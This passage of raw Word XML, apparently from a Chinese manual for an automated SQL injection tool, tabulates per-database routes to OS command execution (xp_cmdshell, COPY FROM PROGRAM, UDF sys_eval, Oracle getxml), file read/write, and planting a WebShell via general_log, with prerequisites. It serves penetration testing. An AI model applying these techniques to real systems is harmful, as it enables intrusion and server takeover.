              <w:t>MySQL</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="8352"/>
          </w:tcPr>
          <w:p w14:paraId="1A15C8D8">
            <w:pPr>
              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>UDF（sys_eval / sys_exec，内置二进制自动写库建函数）</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1392"/>
            <w:shd w:val="clear" w:fill="F0F4FA"/>
          </w:tcPr>
          <w:p w14:paraId="4FF1C7F2">
            <w:pPr>
              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>SQLServer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="8352"/>
            <w:shd w:val="clear" w:fill="F0F4FA"/>
          </w:tcPr>
          <w:p w14:paraId="4E6FEADA">
            <w:pPr>
              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>xp_cmdshell（自动开启组件）、sp_OACreate(wscript.shell) 兜底（xp 被删时用，输出经 BULK INSERT 回读）</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1392"/>
          </w:tcPr>
          <w:p w14:paraId="0C3F0752">
            <w:pPr>
              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>PostgreSQL</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="8352"/>
          </w:tcPr>
          <w:p w14:paraId="7B521D6E">
            <w:pPr>
              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>COPY FROM PROGRAM（9.3+）、UDF（lib_postgresqludf_sys，8.2~9.4）</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1392"/>
            <w:shd w:val="clear" w:fill="F0F4FA"/>
          </w:tcPr>
          <w:p w14:paraId="5F9DFEF2">
            <w:pPr>
              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Kingbase</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="8352"/>
            <w:shd w:val="clear" w:fill="F0F4FA"/>
          </w:tcPr>
          <w:p w14:paraId="5C237B08">
            <w:pPr>
              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>COPY FROM PROGRAM（复用 PG 通道）</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1392"/>
          </w:tcPr>
          <w:p w14:paraId="3F0F87B6">
            <w:pPr>
              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>H2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="8352"/>
          </w:tcPr>
          <w:p w14:paraId="6C0AF508">
            <w:pPr>
              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>CREATE ALIAS Java 函数（需 JDK 编译器 javax.tools 可用，H2 1.x/2.x 均支持，JRE 不可用）</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1392"/>
            <w:shd w:val="clear" w:fill="F0F4FA"/>
          </w:tcPr>
          <w:p w14:paraId="56CFE6EC">
            <w:pPr>
              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Oracle</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="8352"/>
            <w:shd w:val="clear" w:fill="F0F4FA"/>
          </w:tcPr>
          <w:p w14:paraId="59D88414">
            <w:pPr>
              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>GETXML + Java 存储过程（</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="C7254E"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>dbms_xmlquery.getxml</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"> 在 SELECT 中执行匿名 PL/SQL 部署 Java，免堆叠；限 9i~11g，XE/18c+ 不可用）</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1392"/>
          </w:tcPr>
          <w:p w14:paraId="0AEAC76A">
            <w:pPr>
              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>达梦</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="8352"/>
          </w:tcPr>
          <w:p w14:paraId="3AFDFF16">
            <w:pPr>
              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>不支持（实测 DM8 无 DBMS_XMLQUERY，驱动堆叠禁 DDL）</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="73F0FC82">
      <w:pPr>
        <w:spacing w:after="40"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="28B09832">
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
        </w:rPr>
        <w:t>输出逐字符实时回显；自动剥离通道产生的多余换行。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A561AAE">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
        </w:rPr>
        <w:t>6.10 自定义 SQL</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74B45CE8">
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
        </w:rPr>
        <w:t>直接输入任意 SQL，工具按当前注入点与数据库类型自动拼接到可用通道执行并回显结果（多行结果表格化展示）。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54B90176">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
        </w:rPr>
        <w:t>6.11 能力支持矩阵（按数据库 × 注入类型）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="651CB9AE">
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
        </w:rPr>
        <w:t>注入类型缩写：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:i w:val="0"/>
        </w:rPr>
        <w:t>U</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
        </w:rPr>
        <w:t>=Union 联合查询、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:i w:val="0"/>
        </w:rPr>
        <w:t>E</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
        </w:rPr>
        <w:t>=报错、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:i w:val="0"/>
        </w:rPr>
        <w:t>B</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
        </w:rPr>
        <w:t>=Bool 盲注、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:i w:val="0"/>
        </w:rPr>
        <w:t>T</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
        </w:rPr>
        <w:t>=时间盲注、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:i w:val="0"/>
        </w:rPr>
        <w:t>S</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
        </w:rPr>
        <w:t>=堆叠注入；「全通道」= U/E/B/T 任意一种即可（表达式类通道盲注逐位取值较慢，属正常现象）。「字节无损」一列：✅=二进制通道逐字节无损（全程 hex 传输），文本=仅文本内容可靠。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C892402">
      <w:pPr>
        <w:sectPr>
          <w:footerReference w:type="default" r:id="rId9"/>
          <w:pgSz w:w="12240" w:h="15840"/>
          <w:pgMar w:top="1247" w:right="1247" w:bottom="1247" w:left="1247" w:header="720" w:footer="720" w:gutter="0"/>
          <w:cols w:space="720"/>
          <w:docGrid w:linePitch="360"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:type="auto" w:w="0"/>
        <w:jc w:val="center"/>
        <w:tblBorders>
          <w:top w:val="single" w:sz="4" w:color="B8C2D1"/>
          <w:left w:val="single" w:sz="4" w:color="B8C2D1"/>
          <w:bottom w:val="single" w:sz="4" w:color="B8C2D1"/>
          <w:right w:val="single" w:sz="4" w:color="B8C2D1"/>
          <w:insideH w:val="single" w:sz="4" w:color="B8C2D1"/>
          <w:insideV w:val="single" w:sz="4" w:color="B8C2D1"/>
        </w:tblBorders>
        <w:tblLayout w:type="fixed"/>
        <w:tblCellMar>
          <w:top w:w="40" w:type="dxa"/>
          <w:left w:w="80" w:type="dxa"/>
          <w:bottom w:w="40" w:type="dxa"/>
          <w:right w:w="80" w:type="dxa"/>
        </w:tblCellMar>
        <w:tblLook w:firstColumn="1" w:firstRow="1" w:lastColumn="0" w:lastRow="0" w:noHBand="0" w:noVBand="1" w:val="04A0"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="1400"/>
        <w:gridCol w:w="1000"/>
        <w:gridCol w:w="4356"/>
        <w:gridCol w:w="1838"/>
        <w:gridCol w:w="4356"/>
        <w:gridCol w:w="849"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:tblHeader w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1400"/>
            <w:shd w:val="clear" w:fill="1F3B63"/>
          </w:tcPr>
          <w:p w14:paraId="1F5303F2">
            <w:pPr>
              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:i w:val="0"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>数据库</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1000"/>
            <w:shd w:val="clear" w:fill="1F3B63"/>
          </w:tcPr>
          <w:p w14:paraId="25FAC62C">
            <w:pPr>
              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:i w:val="0"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>能力</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4355"/>
            <w:shd w:val="clear" w:fill="1F3B63"/>
          </w:tcPr>
          <w:p w14:paraId="0A51250A">
            <w:pPr>
              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:i w:val="0"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>实现方式（通道）</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1838"/>
            <w:shd w:val="clear" w:fill="1F3B63"/>
          </w:tcPr>
          <w:p w14:paraId="37E06FE4">
            <w:pPr>
              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:i w:val="0"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>注入类型</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4355"/>
            <w:shd w:val="clear" w:fill="1F3B63"/>
          </w:tcPr>
          <w:p w14:paraId="4C3EC7C2">
            <w:pPr>
              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:i w:val="0"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>前置条件</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="849"/>
            <w:shd w:val="clear" w:fill="1F3B63"/>
          </w:tcPr>
          <w:p w14:paraId="7803308A">
            <w:pPr>
              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:i w:val="0"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>字节无损</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1400"/>
            <w:vMerge w:val="restart"/>
          </w:tcPr>
          <w:p w14:paraId="34544DD4">
            <w:pPr>
              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>MySQL</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1000"/>
          </w:tcPr>
          <w:p w14:paraId="47AE78B4">
            <w:pPr>
              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>文件读取</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4355"/>
          </w:tcPr>
          <w:p w14:paraId="61EE1544">
            <w:pPr>
              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="C7254E"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>load_file()</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1838"/>
          </w:tcPr>
          <w:p w14:paraId="4165C71A">
            <w:pPr>
              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>全通道</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4355"/>
          </w:tcPr>
          <w:p w14:paraId="2CFD9CAE">
            <w:pPr>
              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">FILE 权限 + </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="C7254E"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>secure_file_priv</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"> 允许目标路径 + 绝对路径</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="849"/>
          </w:tcPr>
          <w:p w14:paraId="67D32D36">
            <w:pPr>
              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>✅</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1400"/>
            <w:vMerge/>
            <w:shd w:val="clear" w:fill="F0F4FA"/>
          </w:tcPr>
          <w:p w14:paraId="485B722A"/>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1000"/>
            <w:shd w:val="clear" w:fill="F0F4FA"/>
          </w:tcPr>
          <w:p w14:paraId="6CFAED20">
            <w:pPr>
              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>文件写入</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4355"/>
            <w:shd w:val="clear" w:fill="F0F4FA"/>
          </w:tcPr>
          <w:p w14:paraId="41187D54">
            <w:pPr>
              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Union </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="C7254E"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>INTO DUMPFILE</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">（≤4KB 单发）；堆叠临时表分片按序拼接，写后 </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="C7254E"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>length(load_file())</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"> 验证</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1838"/>
            <w:shd w:val="clear" w:fill="F0F4FA"/>
          </w:tcPr>
          <w:p w14:paraId="58719884">
            <w:pPr>
              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>U 或 S</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4355"/>
            <w:shd w:val="clear" w:fill="F0F4FA"/>
          </w:tcPr>
          <w:p w14:paraId="2E63DECE">
            <w:pPr>
              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">FILE 权限 + </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="C7254E"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>secure_file_priv</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"> 为空 + 目录可写</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="849"/>
            <w:shd w:val="clear" w:fill="F0F4FA"/>
          </w:tcPr>
          <w:p w14:paraId="47CA36B2">
            <w:pPr>
              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>✅</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1400"/>
            <w:vMerge/>
          </w:tcPr>
          <w:p w14:paraId="4713E746"/>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1000"/>
          </w:tcPr>
          <w:p w14:paraId="10479FDA">
            <w:pPr>
              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>文件写入</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4355"/>
          </w:tcPr>
          <w:p w14:paraId="184ADBD6">
            <w:pPr>
              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>general_log 写 WebShell</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1838"/>
          </w:tcPr>
          <w:p w14:paraId="0C1937D2">
            <w:pPr>
              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>S</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4355"/>
          </w:tcPr>
          <w:p w14:paraId="01946658">
            <w:pPr>
              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>FILE 权限 + 可改 general_log 路径</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="849"/>
          </w:tcPr>
          <w:p w14:paraId="08495A42">
            <w:pPr>
              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>文本</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1400"/>
            <w:vMerge/>
            <w:shd w:val="clear" w:fill="F0F4FA"/>
          </w:tcPr>
          <w:p w14:paraId="76F6F546"/>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1000"/>
            <w:shd w:val="clear" w:fill="F0F4FA"/>
          </w:tcPr>
          <w:p w14:paraId="6908C80C">
            <w:pPr>
              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>命令执行</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4355"/>
            <w:shd w:val="clear" w:fill="F0F4FA"/>
          </w:tcPr>
          <w:p w14:paraId="4664F708">
            <w:pPr>
              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>UDF sys_eval（内置 lib_mysqludf_sys 二进制自动写 plugin 目录 + CREATE FUNCTION）</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1838"/>
            <w:shd w:val="clear" w:fill="F0F4FA"/>
          </w:tcPr>
          <w:p w14:paraId="0EC05AB4">
            <w:pPr>
              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>U/S 部署 + 全通道调用</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4355"/>
            <w:shd w:val="clear" w:fill="F0F4FA"/>
          </w:tcPr>
          <w:p w14:paraId="299B0E10">
            <w:pPr>
              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">FILE 权限 + plugin 目录可写 + </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="C7254E"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>secure_file_priv</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"> 为空</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="849"/>
            <w:shd w:val="clear" w:fill="F0F4FA"/>
          </w:tcPr>
          <w:p w14:paraId="22BE1EB0">
            <w:pPr>
              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>—</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1400"/>
            <w:vMerge w:val="restart"/>
          </w:tcPr>
          <w:p w14:paraId="0B486C40">
            <w:pPr>
              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>SQLServer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1000"/>
          </w:tcPr>
          <w:p w14:paraId="521932CC">
            <w:pPr>
